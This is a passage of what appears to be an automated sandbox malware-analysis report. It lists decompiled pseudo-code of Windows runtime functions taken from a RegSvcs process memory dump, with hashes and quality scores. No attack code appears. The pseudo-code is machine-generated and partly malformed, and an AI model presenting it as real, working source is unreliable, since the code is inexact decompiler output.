                                          				_v58 = 0x267;
                                          				if(E01317D50() == 0) {
                                          					_t18 = 0x7ffe0388;
                                          				} else {
                                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          				}
                                          				_push( &_v64);
                                          				_push(0x10);
                                          				_push(0x20402);
                                          				_push( *_t18 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff194c79b2a3dc716edbd2599f422719dafaec36dbaf8cca7ff6d872b5a98632
                                          • Instruction ID: 03ce01592b18b093bd394ae43bee32b7099f964092f3af942f51964faabd3dc9
                                          • Opcode Fuzzy Hash: ff194c79b2a3dc716edbd2599f422719dafaec36dbaf8cca7ff6d872b5a98632
                                          • Instruction Fuzzy Hash: AB018471E0020DAFDB14DFA9D845FAEBBBCEF84714F404066B904AB291DA709901C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E013AFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				signed int _v12;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				short _v58;
                                          				char _v64;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed char* _t18;
                                          				intOrPtr _t24;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				signed int _t32;
                                          
                                          				_t29 = __edx;
                                          				_t24 = __ebx;
                                          				_v12 =  *0x13ed360 ^ _t32;
                                          				_t30 = __edx;
                                          				_t31 = __ecx;
                                          				E0133FA60( &_v64, 0, 0x30);
                                          				_v24 = _a4;
                                          				_v32 = _t31;
                                          				_v28 = _t30;
                                          				_v58 = 0x266;
                                          				if(E01317D50() == 0) {
                                          					_t18 = 0x7ffe0388;
                                          				} else {
                                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          				}
                                          				_push( &_v64);
                                          				_push(0x10);
                                          				_push(0x20402);
                                          				_push( *_t18 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 05079080023b2de91f4638a3d1066527234c7568ce083d1545005fef3e7fd580
                                          • Instruction ID: 9bdd51a4cfa72134bd11e44650155d2bde28b334971a3a69dcf265730e1577ff
                                          • Opcode Fuzzy Hash: 05079080023b2de91f4638a3d1066527234c7568ce083d1545005fef3e7fd580
                                          • Instruction Fuzzy Hash: 2A018871E0020DAFDB14DBA9D845FAEB7BCEF44714F404066BA009B290DA709901C799
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E013C8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v12;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				short _v66;
                                          				char _v72;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed char* _t18;
                                          				signed int _t32;
                                          
                                          				_t29 = __edx;
                                          				_v12 =  *0x13ed360 ^ _t32;
                                          				_t31 = _a8;
                                          				_t30 = _a12;
                                          				_v66 = 0x1c20;
                                          				_v40 = __ecx;
                                          				_v36 = __edx;
                                          				_v32 = _a4;
                                          				_v28 = _a8;
                                          				_v24 = _a12;
                                          				if(E01317D50() == 0) {
                                          					_t18 = 0x7ffe0386;
                                          				} else {
                                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          				}
                                          				_push( &_v72);
                                          				_push(0x14);
                                          				_push(0x20402);
                                          				_push( *_t18 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f8de99708bb258e92602a1b69ebc1a118cadbc5fb360dd2cc366a77d7eb867b
                                          • Instruction ID: 0905550af8a7716b28141559c2f9c63e874050d7aeeb646efafd12d62b53e68f
                                          • Opcode Fuzzy Hash: 9f8de99708bb258e92602a1b69ebc1a118cadbc5fb360dd2cc366a77d7eb867b
                                          • Instruction Fuzzy Hash: 4E012C75A0021DAFDB04DFADD9419AEBBB8EF58714F10405AF904E7351DA34AE01CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E013C8ED6(intOrPtr __ecx, intOrPtr __edx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				short _v62;
                                          				char _v68;
                                          				signed char* _t29;
                                          				intOrPtr _t35;
                                          				intOrPtr _t41;
                                          				intOrPtr _t42;
                                          				signed int _t43;
                                          
                                          				_t40 = __edx;
                                          				_v8 =  *0x13ed360 ^ _t43;
                                          				_v28 = __ecx;
                                          				_v62 = 0x1c2a;
                                          				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                          				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                          				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                          				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                          				_v24 = __edx;
                                          				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                          				if(E01317D50() == 0) {
                                          					_t29 = 0x7ffe0386;
                                          				} else {
                                          					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          				}
                                          				_push( &_v68);
                                          				_push(0x1c);
                                          				_push(0x20402);
                                          				_push( *_t29 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E012FDB60(signed int __ecx) {
                                          				intOrPtr* _t9;
                                          				void* _t12;
                                          				void* _t13;
                                          				intOrPtr _t14;
                                          
                                          				_t9 = __ecx;
                                          				_t14 = 0;
                                          				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                          					_t13 = 0xc000000d;
                                          				} else {
                                          					_t14 = E012FDB40();
                                          					if(_t14 == 0) {
                                          						_t13 = 0xc0000017;
                                          					} else {
                                          						_t13 = E012FE7B0(__ecx, _t12, _t14, 0xfff);
                                          						if(_t13 < 0) {
                                          							L012FE8B0(__ecx, _t14, 0xfff);
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                          							_t14 = 0;
                                          						} else {
                                          							_t13 = 0;
                                          							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                          						}
                                          					}
                                          				}
                                          				 *_t9 = _t14;
                                          				return _t13;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E012FB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                          				signed char* _t13;
                                          				intOrPtr _t22;
                                          				char _t23;
                                          
                                          				_t23 = __edx;
                                          				_t22 = __ecx;
                                          				if(E01317D50() != 0) {
                                          					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                          				} else {
                                          					_t13 = 0x7ffe0384;
                                          				}
                                          				if( *_t13 != 0) {
                                          					_t13 =  *[fs:0x30];
                                          					if((_t13[0x240] & 0x00000004) == 0) {
                                          						goto L3;
                                          					}
                                          					if(E01317D50() == 0) {
                                          						_t13 = 0x7ffe0385;
                                          					} else {
                                          						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                          					}
                                          					if(( *_t13 & 0x00000020) == 0) {
                                          						goto L3;
                                          					}
                                          					return E01377016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                          				} else {
                                          					L3:
                                          					return _t13;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E0138FE87(intOrPtr __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				signed int _v24;
                                          				intOrPtr _v28;
                                          				short _v54;
                                          				char _v60;
                                          				signed char* _t21;
                                          				intOrPtr _t27;
                                          				intOrPtr _t32;
                                          				intOrPtr _t33;
                                          				intOrPtr _t34;
                                          				signed int _t35;
                                          
                                          				_v8 =  *0x13ed360 ^ _t35;
                                          				_v16 = __ecx;
                                          				_v54 = 0x1722;
                                          				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                          				_v28 =  *((intOrPtr*)(__ecx + 4));
                                          				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                          				if(E01317D50() == 0) {
                                          					_t21 = 0x7ffe0382;
                                          				} else {
                                          					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                          				}
                                          				_push( &_v60);
                                          				_push(0x10);
                                          				_push(0x20402);
                                          				_push( *_t21 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 48%
                                          			E013B131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				short _v50;
                                          				char _v56;
                                          				signed char* _t18;
                                          				intOrPtr _t24;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				signed int _t32;
                                          
                                          				_t29 = __edx;
                                          				_v8 =  *0x13ed360 ^ _t32;
                                          				_v20 = _a4;
                                          				_v12 = _a8;
                                          				_v24 = __ecx;
                                          				_v16 = __edx;
                                          				_v50 = 0x1021;
                                          				if(E01317D50() == 0) {
                                          					_t18 = 0x7ffe0380;
                                          				} else {
                                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				}
                                          				_push( &_v56);
                                          				_push(0x10);
                                          				_push(0x20402);
                                          				_push( *_t18 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 48%
                                          			E013C8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				short _v50;
                                          				char _v56;
                                          				signed char* _t18;
                                          				intOrPtr _t24;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				signed int _t32;
                                          
                                          				_t29 = __edx;
                                          				_v8 =  *0x13ed360 ^ _t32;
                                          				_v16 = __ecx;
                                          				_v50 = 0x1c2c;
                                          				_v24 = _a4;
                                          				_v20 = _a8;
                                          				_v12 = __edx;
                                          				if(E01317D50() == 0) {
                                          					_t18 = 0x7ffe0386;
                                          				} else {
                                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          				}
                                          				_push( &_v56);
                                          				_push(0x10);
                                          				_push(0x402);
                                          				_push( *_t18 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E013B1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				short _v46;
                                          				char _v52;
                                          				signed char* _t15;
                                          				intOrPtr _t21;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				signed int _t29;
                                          
                                          				_t26 = __edx;
                                          				_v8 =  *0x13ed360 ^ _t29;
                                          				_v12 = _a4;
                                          				_v20 = __ecx;
                                          				_v16 = __edx;
                                          				_v46 = 0x1024;
                                          				if(E01317D50() == 0) {
                                          					_t15 = 0x7ffe0380;
                                          				} else {
                                          					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				}
                                          				_push( &_v52);
                                          				_push(0xc);
                                          				_push(0x20402);
                                          				_push( *_t15 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 78fd23fb4213e0c89fc100b1f533cf432a778f60c43355c7bf2a40be7c658056
                                          • Instruction ID: 3c25c9fce7106335d37e2e6c445517480bf3d2d9f76c256ddfd1e39f3afb3580
                                          • Opcode Fuzzy Hash: 78fd23fb4213e0c89fc100b1f533cf432a778f60c43355c7bf2a40be7c658056
                                          • Instruction Fuzzy Hash: 05F06D71E0024CEFDB14EFA8D445AAEBBF8EF58304F444069AA15EB391EA349900DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0131C577(void* __ecx, char _a4) {
                                          				void* __esi;
                                          				void* __ebp;
                                          				void* _t17;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t21;
                                          
                                          				_t18 = __ecx;
                                          				_t21 = __ecx;
                                          				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0131C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x12d11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                          					__eflags = _a4;
                                          					if(__eflags != 0) {
                                          						L10:
                                          						E013C88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                          						L9:
                                          						return 0;
                                          					}
                                          					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                          					if(__eflags == 0) {
                                          						goto L10;
                                          					}
                                          					goto L9;
                                          				} else {
                                          					return 1;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23ae4baec0965b444205bcc2ac518fdda6017b344f69d0aba5f1a678d30c218d
                                          • Instruction ID: 4d14b49665c73c519e02c445bf966f5229b4b25f7f24641a1a1639b058e54a76
                                          • Opcode Fuzzy Hash: 23ae4baec0965b444205bcc2ac518fdda6017b344f69d0aba5f1a678d30c218d
                                          • Instruction Fuzzy Hash: CDF024B2891294CFE73EC32EC004B227FD99B0463CF446467D4058350AC2A0CC80C244
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E013B2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                          				void* __esi;
                                          				signed char _t3;
                                          				signed char _t7;
                                          				void* _t19;
                                          
                                          				_t17 = __ecx;
                                          				_t3 = E013AFD22(__ecx);
                                          				_t19 =  *0x13e849c - _t3; // 0x0
                                          				if(_t19 == 0) {
                                          					__eflags = _t17 -  *0x13e8748; // 0x0
                                          					if(__eflags <= 0) {
                                          						E013B1C06();
                                          						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                          						__eflags = _t3;
                                          						if(_t3 != 0) {
                                          							L5:
                                          							__eflags =  *0x13e8724 & 0x00000004;
                                          							if(( *0x13e8724 & 0x00000004) == 0) {
                                          								asm("int3");
                                          								return _t3;
                                          							}
                                          						} else {
                                          							_t3 =  *0x7ffe02d4 & 0x00000003;
                                          							__eflags = _t3 - 3;
                                          							if(_t3 == 3) {
                                          								goto L5;
                                          							}
                                          						}
                                          					}
                                          					return _t3;
                                          				} else {
                                          					_t7 =  *0x13e8724; // 0x0
                                          					return E013A8DF1(__ebx, 0xc0000374, 0x13e5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0437db535b102733fe681860ad09ae137ba26529a0930103ee92ddf04c942f5a
                                          • Instruction ID: 89d7150ced9afa024e957833e8b51219768383796dd07ac6c0469a183f688eec
                                          • Opcode Fuzzy Hash: 0437db535b102733fe681860ad09ae137ba26529a0930103ee92ddf04c942f5a
                                          • Instruction Fuzzy Hash: FBF0557A8152868ADF336B2C35903E33FCAD75525CF0A01C5DA902BA49D5349883CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E0133927A(void* __ecx) {
                                          				signed int _t11;
                                          				void* _t14;
                                          
                                          				_t11 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                          				if(_t11 != 0) {
                                          					E0133FA60(_t11, 0, 0x98);
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                          					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                          					E013392C6(_t11, _t14);
                                          				}
                                          				return _t11;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction ID: 84a9a79dbb16f83d38e3048ba4dd1057e2cad6e1dd21b8c4ebd55ae52cc22841
                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction Fuzzy Hash: 70E02B323409016BE7119E0DCC80F03375DDFD2728F004078B5005E242C6E6DC098BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 43%
                                          			E013C8D34(intOrPtr __ecx, intOrPtr __edx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				short _v42;
                                          				char _v48;
                                          				signed char* _t12;
                                          				intOrPtr _t18;
                                          				intOrPtr _t24;
                                          				intOrPtr _t25;
                                          				signed int _t26;
                                          
                                          				_t23 = __edx;
                                          				_v8 =  *0x13ed360 ^ _t26;
                                          				_v16 = __ecx;
                                          				_v42 = 0x1c2b;
                                          				_v12 = __edx;
                                          				if(E01317D50() == 0) {
                                          					_t12 = 0x7ffe0386;
                                          				} else {
                                          					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          				}
                                          				_push( &_v48);
                                          				_push(8);
                                          				_push(0x20402);
                                          				_push( *_t12 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f7316e4f44f8ff948eec3f7cf87f62668a36e5b2625f011565fa6c01ed0df78
                                          • Instruction ID: f8726831983b26d3e16aa078126f737156f39d287d69d64f5c0dd6e7b18d4ff1
                                          • Opcode Fuzzy Hash: 9f7316e4f44f8ff948eec3f7cf87f62668a36e5b2625f011565fa6c01ed0df78
                                          • Instruction Fuzzy Hash: 90F0BE70E0460DAFDB14EFB8D445B6EB7B8EF58704F508099E905EB291EA34DA00CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 36%
                                          			E013C8B58(intOrPtr __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v20;
                                          				short _v46;
                                          				char _v52;
                                          				signed char* _t11;
                                          				intOrPtr _t17;
                                          				intOrPtr _t22;
                                          				intOrPtr _t23;
                                          				intOrPtr _t24;
                                          				signed int _t25;
                                          
                                          				_v8 =  *0x13ed360 ^ _t25;
                                          				_v20 = __ecx;
                                          				_v46 = 0x1c26;
                                          				if(E01317D50() == 0) {
                                          					_t11 = 0x7ffe0386;
                                          				} else {
                                          					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          				}
                                          				_push( &_v52);
                                          				_push(4);
                                          				_push(0x402);
                                          				_push( *_t11 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 87bbc3203b58910c7c656878453ba0e7d8070eb6e9a8bb0e491fc99e78d511e3
                                          • Instruction ID: 6cdf9b88030cd98fe6023da6ffca6e8cd7da478d17b48a42b6d03beb47d21d66
                                          • Opcode Fuzzy Hash: 87bbc3203b58910c7c656878453ba0e7d8070eb6e9a8bb0e491fc99e78d511e3
                                          • Instruction Fuzzy Hash: C5F082B1A0425DAFDB14EBA8D906E6EB7B8EF44708F440499BA05DB3D1EA74D900C798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E0131746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                          				signed int _t8;
                                          				void* _t10;
                                          				short* _t17;
                                          				void* _t19;
                                          				intOrPtr _t20;
                                          				void* _t21;
                                          
                                          				_t20 = __esi;
                                          				_t19 = __edi;
                                          				_t17 = __ebx;
                                          				if( *((char*)(_t21 - 0x25)) != 0) {
                                          					if(__ecx == 0) {
                                          						E0130EB70(__ecx, 0x13e79a0);
                                          					} else {
                                          						asm("lock xadd [ecx], eax");
                                          						if((_t8 | 0xffffffff) == 0) {
                                          							_push( *((intOrPtr*)(__ecx + 4)));
                                          							E013395D0();
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                          							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                          							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                          						}
                                          					}
                                          					L10:
                                          				}
                                          				_t10 = _t19 + _t19;
                                          				if(_t20 >= _t10) {
                                          					if(_t19 != 0) {
                                          						 *_t17 = 0;
                                          						return 0;
                                          					}
                                          				}
                                          				return _t10;
                                          				goto L10;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c6bd6d6dd36f249da933419eeed9c6b118d213a5d15307ee83fca362c7aa7dc
                                          • Instruction ID: 11590734405d9a4c4172c898749411e0a33f76177aa38ebba12953a03145a3ed
                                          • Opcode Fuzzy Hash: 1c6bd6d6dd36f249da933419eeed9c6b118d213a5d15307ee83fca362c7aa7dc
                                          • Instruction Fuzzy Hash: 6FF05934580149EADF0A97ACC440FFA7FB5AF0031CF0C0115D851B7199EB24C800C785
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 36%
                                          			E013C8CD6(intOrPtr __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				short _v38;
                                          				char _v44;
                                          				signed char* _t11;
                                          				intOrPtr _t17;
                                          				intOrPtr _t22;
                                          				intOrPtr _t23;
                                          				intOrPtr _t24;
                                          				signed int _t25;
                                          
                                          				_v8 =  *0x13ed360 ^ _t25;
                                          				_v12 = __ecx;
                                          				_v38 = 0x1c2d;
                                          				if(E01317D50() == 0) {
                                          					_t11 = 0x7ffe0386;
                                          				} else {
                                          					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          				}
                                          				_push( &_v44);
                                          				_push(0xffffffe4);
                                          				_push(0x402);
                                          				_push( *_t11 & 0x000000ff);
                                          				return E0133B640(E01339AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
